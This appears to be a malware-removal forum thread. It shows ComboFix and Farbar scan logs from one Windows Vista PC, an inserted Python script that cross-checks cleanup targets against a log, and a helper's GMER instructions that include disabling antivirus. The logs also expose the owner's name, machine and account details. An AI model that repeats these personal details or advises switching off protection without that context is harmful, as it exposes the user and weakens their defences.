"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ   Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ   HPSLPSVC
hpdevmgmt REG_MULTI_SZ   hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-26 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-26 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-08-26 09:29
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...  
.
scanning hidden autostart entries ... 
.
scanning hidden files ...  
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Dell\DellDock\DockLogin.exe
c:\windows\system32\WLANExt.exe
c:\program files\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files\AVG\AVG10\avgfws.exe
c:\program files\AVG\AVG10\avgwdsvc.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\windows\dwrcs\DWRCS.EXE
c:\windows\system32\lxblcoms.exe
c:\windows\system32\msiexec.exe
c:\program files\HTC\Internet Pass-Through\PassThruSvr.exe
c:\program files\Sony\PMB\PMBDeviceInfoProvider.exe
c:\program files\NETGEAR\WNA1100\WifiSvc.exe
c:\windows\system32\WUDFHost.exe
c:\program files\AVG\AVG10\avgnsx.exe
c:\program files\Dell\DellDock\DellDock.exe
c:\program files\Glary Utilities 5\Integrator.exe
c:\windows\RtHDVCpl.exe
c:\program files\ActivIdentity\ActivClient\acsagent.exe
c:\program files\HP\Digital Imaging\bin\hpqtra08.exe
c:\program files\NETGEAR\WNA1100\WNA1100.exe
c:\program files\Microsoft Office\Office12\ONENOTEM.EXE
c:\windows\ehome\ehmsas.exe
c:\program files\iPod\bin\iPodService.exe
c:\program files\Windows Media Player\wmpnetwk.exe
c:\program files\HP\Digital Imaging\bin\hpqSTE08.exe
c:\program files\HP\Digital Imaging\bin\hpqbam08.exe
c:\program files\HP\Digital Imaging\bin\hpqgpc01.exe
c:\program files\Common Files\Apple\Internet Services\APSDaemon.exe
.
**************************************************************************
.
Completion time: 2014-08-26  09:34:08 - machine was rebooted
ComboFix-quarantined-files.txt  2014-08-26 13:34
ComboFix2.txt  2014-08-25 18:24
ComboFix3.txt  2014-08-25 15:10
ComboFix4.txt  2014-08-24 19:45
ComboFix5.txt  2014-08-26 12:26
.
Pre-Run: 238,265,204,736 bytes free
Post-Run: 238,311,092,224 bytes free
.
- - End Of File - - 51838510CD7675792343D8F764ACFBD5
5C616939100B85E558DA92B899A0FC36
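A cross-check of the CFScript targets against the "Other Deletions" section of the ComboFix log posted above, written as an added example that is not part of the original thread or of ComboFix. The one-entry-per-line script layout and all function names are assumptions; the sample data is abridged from the thread.

```python
import re

# Section directives used by the CFScript in this thread.
DIRECTIVES = {"KillAll", "Folder", "File", "Driver", "Registry"}

# Abridged from the thread: Registry section omitted, one entry per line (assumed layout).
CFSCRIPT = r"""
KillAll::
Folder::
c:\programdata\IrfuqApivh
c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
c:\users\savas.kyriakidis\AppData\Local\browser_dir
c:\users\savas.kyriakidis\AppData\Local\42a495
c:\users\savas.kyriakidis\AppData\Roaming\42a495
C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile
C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
C:\Program Files\AVG\AVG10\Toolbar
C:\Program Files\Common Files\AVG Secure Search
File::
C:\Windows\system32\jsllnzn.dll
C:\Windows\System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5}
C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll
C:\Windows\System32\Tasks\Time Trigger Test Task
C:\Windows\System32\Tasks\Security Center Update - 754758581
Driver::
AVG Security Toolbar Service
vToolbarUpdater
"""

# Abridged from the thread: banners shortened, most child files left out.
COMBOFIX_LOG = r"""
((((((   Other Deletions   ))))))
.
c:\programdata\IrfuqApivh
c:\users\savas.kyriakidis\AppData\Local\42a495
c:\users\savas.kyriakidis\AppData\Local\browser_dir
c:\users\savas.kyriakidis\AppData\Local\browser_dir\browser.exe
c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\JawaVinyl.pac
c:\users\savas.kyriakidis\AppData\Roaming\42a495
c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
c:\windows\System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5}
c:\windows\System32\Tasks\Security Center Update - 754758581
c:\windows\System32\Tasks\Time Trigger Test Task
.
((((((   Drivers/Services   ))))))
.
-------\Service_AVG Security Toolbar Service
-------\Service_vToolbarUpdater
"""


def norm(path):
    """Case-insensitive, quote- and trailing-slash-insensitive path key."""
    return path.strip().strip('"').rstrip("\\").lower()


def parse_cfscript(text):
    """Split a line-oriented CFScript into {directive: [entries]}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = re.fullmatch(r"(\w+)::", line)
        if m and m.group(1) in DIRECTIVES:
            current = m.group(1)
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def parse_deletions(log_text):
    """Collect the paths listed between the 'Other Deletions' banner and the next banner."""
    paths, in_section = set(), False
    for raw in log_text.splitlines():
        line = raw.strip()
        if line.startswith("((("):
            in_section = "Other Deletions" in line
        elif in_section and re.match(r"[a-zA-Z]:\\", line):
            paths.add(norm(line))
    return paths


def is_listed(target, deleted):
    """True if the target itself, or anything beneath it, appears in the deletions."""
    t = norm(target)
    return any(d == t or d.startswith(t + "\\") for d in deleted)


def audit(script_text, log_text):
    """Sort every Folder::/File:: target into confirmed or unconfirmed."""
    sections = parse_cfscript(script_text)
    deleted = parse_deletions(log_text)
    report = {"confirmed": [], "unconfirmed": []}
    for directive in ("Folder", "File"):
        for target in sections.get(directive, []):
            key = "confirmed" if is_listed(target, deleted) else "unconfirmed"
            report[key].append(target)
    return report


if __name__ == "__main__":
    for status, targets in audit(CFSCRIPT, COMBOFIX_LOG).items():
        print(status)
        for t in targets:
            print("   ", t)
```

Targets reported as unconfirmed were requested in the script but are not listed under "Other Deletions" in the log, so a follow-up scan is the place to check whether they are still present.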

Looks better.
 
Now:
 
 
Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

 

Scan with Gmer

This type of scan often produces false positives. Do not take any action at any point on any suspicious entries you may see there. Instead, post the log to be analyzed.

Please download GMER by Gmer and save the file to your desktop.
It will come as a randomly named file (like a6ge38b4.exe) - that's absolutely normal.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on the randomly named Gmer icon and select Run as Administrator to start the tool.
  • It is very important that you do not use your computer while Gmer is running!
  • Gmer will open to the Rootkit/Malware tab and perform an automatic quick scan.
  • If you receive a warning about rootkit activity and are asked to fully scan your system click NO!

When the pre-scan is completed, please do the following:

  • Please check in the Quick scan box.
  • Please uncheck the IAT/EAT and Show All.
  • Click Scan.
  • If you see a rootkit warning window click OK.
  • When the scan is finished, Save the results to your desktop as gmer.log.

Please include the content of this file in your next reply.
Don't forget to re-enable previously switched-off protection software!

If you encounter any problems, try running GMER in Safe Mode.
If GMER crashes or keeps resulting in a Blue Screen of Death, uncheck Devices on the right side before scanning.


FRST

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 26-08-2014 14:19:28
Running from F:\
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgtray.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM\...\RunOnce: [AvgUninstallURL] => cmd.exe /c start http://www.avg.com/ww.special-uninstallation-feedback-lsf?lic=OUxTRlJFRS1WUFVaNy1HMkNNWC1SWFBXQS1QM05aSC05RDIwQy0zN1RT"&"inst=NzctMTIyNzA3NzAwOS1GSSsxLUZMMTArMS1ERFQrMC1UVUcrMy1MU0QrM (the data entry has 100 more characters).
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk *  BootDefrag.exesasnative32
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
